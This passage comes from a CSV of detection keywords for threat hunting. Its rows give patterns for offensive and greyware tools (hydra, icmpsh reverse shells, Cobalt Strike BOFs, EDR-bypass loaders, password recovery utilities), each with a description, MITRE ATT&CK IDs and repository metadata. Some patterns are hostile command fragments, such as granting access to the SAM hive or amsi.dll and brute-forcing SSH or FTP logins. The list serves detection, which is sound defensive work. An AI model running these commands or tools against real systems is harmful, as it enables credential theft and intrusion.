preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://we.tl/t-*,greyware_tool_keyword,wetransfer,WeTransfer is a popular file sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files,T1608.001 - T1566 - T1002 - T1048 - T1204,TA0001 - TA0002 - TA0010,N/A,EXOTIC LILY,Phishing,https://twitter.com/mthcht/status/1658853848323182597,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://web.archive.org/*https://www.kernel-exploits.com/media/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*https://wetransfer.com/api/v4/transfers/*,greyware_tool_keyword,wetransfer,WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files,T1608.001 - T1566 - T1002 - T1048 - T1204,TA0001 - TA0002 - TA0010,N/A,EXOTIC LILY,Phishing,https://twitter.com/mthcht/status/1658853848323182597,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://wetransfer.com/downloads/*,greyware_tool_keyword,wetransfer,WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files,T1608.001 - T1566 - T1002 - T1048 - T1204,TA0001 - TA0002 - TA0010,N/A,EXOTIC LILY,Phishing,https://twitter.com/mthcht/status/1658853848323182597,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://wfuzz.readthedocs.io*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*https://www.email-format.com/d/*,greyware_tool_keyword,email-format,used by attackers to find informations about a company users,T1593 - T1596 - T1213,TA0009,N/A,N/A,Reconnaissance,https://www.email-format.com,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.myget.org/F/fireeye/api/v2*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*https://www.nirsoft.net/toolsdownload/*,greyware_tool_keyword,nirsoft tools,NirSoft is a legitimate software company that develops system utilities for Windows. Some of its tools can be used by malicious actors to recover passwords harvest sensitive information and conduct password attacks.,T1003 - T1003.001 - T1003.002 - T1110 - T1566,TA0002 - TA0003 - TA0004 - TA0006 - TA0007 - TA0008 - TA0011,N/A,N/A,Collection,N/A,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.nirsoft.net/toolsdownload/*.exe*,greyware_tool_keyword,nirsoft tools,some of nirsoft tools can be abused by attackers to retrieve passwords ,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,nirsoft.net,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.nirsoft.net/toolsdownload/*.zip*,greyware_tool_keyword,nirsoft tools,some of nirsoft tools can be abused by attackers to retrieve passwords ,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,nirsoft.net,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.nirsoft.net/utils/*.exe*,greyware_tool_keyword,nirsoft tools,some of nirsoft tools can be abused by attackers to retrieve passwords ,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,nirsoft.net,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.nirsoft.net/utils/*.zip*,greyware_tool_keyword,nirsoft tools,some of nirsoft tools can be abused by attackers to retrieve passwords ,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,nirsoft.net,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.skymem.info/srch?q=*,greyware_tool_keyword,skymen.info,used by attackers to find informations about a company users,T1593 - T1596 - T1213,TA0009,N/A,N/A,Reconnaissance,https://www.skymem.info,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https_revshell.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*httpsmuggler.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*https-portal*,offensive_tool_keyword,https-portal,HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.,T1042 - T1571 - T1021 - T1135,TA0002 - TA0003 - TA0004,N/A,N/A,Sniffing & Spoofing,https://github.com/SteveLTN/https-portal,1,0,N/A,N/A,10,4209,288,2023-01-29T14:55:41Z,2015-12-14T20:09:04Z -*'http-stager'*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,0,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*huan.exe *.exe,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,0,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*Huan.sln*,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,1,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*Huan.vcxproj*,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,1,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*HuanLoader.vcxproj*,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,1,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*hub.docker.com/u/kalilinux/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HunnicCyber/SharpDomainSpray*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*HVNC Server.exe*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HVNC\ Server*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*hydra -*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * ftp://*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * http-post-form *,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * mysql://*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * ssh://*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * telnet://*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra smtp-enum*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra.c*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra:x:10001:*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*HYDRA_PROXY_HTTP*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra-cobaltstrike*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*Hyperion PE-Crypter*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*hyperion.exe *,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*hyperion_2.0.orig.tar.gz*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Hypnos-main.zip*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,1,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*hypobrychium.exe*,offensive_tool_keyword,hypobrychium,hypobrychium AV/EDR Bypass,T1562.001 - T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/foxlox/hypobrychium,1,1,N/A,8,1,72,21,2023-07-21T21:13:20Z,2023-07-18T09:55:07Z -*hypobrychium-main*,offensive_tool_keyword,hypobrychium,hypobrychium AV/EDR Bypass,T1562.001 - T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/foxlox/hypobrychium,1,1,N/A,8,1,72,21,2023-07-21T21:13:20Z,2023-07-18T09:55:07Z -*i2pinstall*,offensive_tool_keyword,I2P,I2P - The Invisible Internet Project.,T1048.001 - T1568.003,TA0011 - TA0040,N/A,N/A,Data Exfiltration,https://geti2p.net/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*iam__enum_assume_role/default-word-list.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*iammaguire/Gotato*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,1,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*ibmiscanner2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*IBurpExtender.java*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*IBurpExtenderCallbacks.java*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0010 - TA0007 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -"*icacls ""C:\windows\system32\config\SAM"" /grant*",greyware_tool_keyword,icalcs,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*icacls.exe C:\Windows\System32\amsi.dll /grant administrators:F*,greyware_tool_keyword,icalcs,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin,1,0,N/A,10,8,N/A,N/A,N/A,N/A -*icebreaker:P@ssword123456*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*icebreaker-master.zip*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*icebreaker-scan.xml*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*IcebreakerSecurity/DelegationBOF*,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*IcebreakerSecurity/DelegationBOF*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*IcebreakerSecurity/PersistBOF*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*ice-wzl/wmiexec2*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*ICMP-ReceiveFile.py*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*Icmp-Redirect.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*ICMP-SendFile.py*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*icmpsh.exe*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*icmpsh.exe*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*icmpsh.git*,offensive_tool_keyword,icmpsh,Simple reverse ICMP shell,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/bdamele/icmpsh,1,1,N/A,10,10,1475,424,2018-04-06T17:15:44Z,2011-04-15T10:04:12Z -*icmpsh_m.py*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*icmpsh_m.py*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*icmpsh-m.*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*icmpsh-m.c*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*icmpsh-m.pl*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*icmpsh-master*,offensive_tool_keyword,icmpsh,Simple reverse ICMP shell,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/bdamele/icmpsh,1,1,N/A,10,10,1475,424,2018-04-06T17:15:44Z,2011-04-15T10:04:12Z -*icmpsh-s.*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*icmptunnel*,offensive_tool_keyword,icmptunnel,icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. The IP traffic is sent in 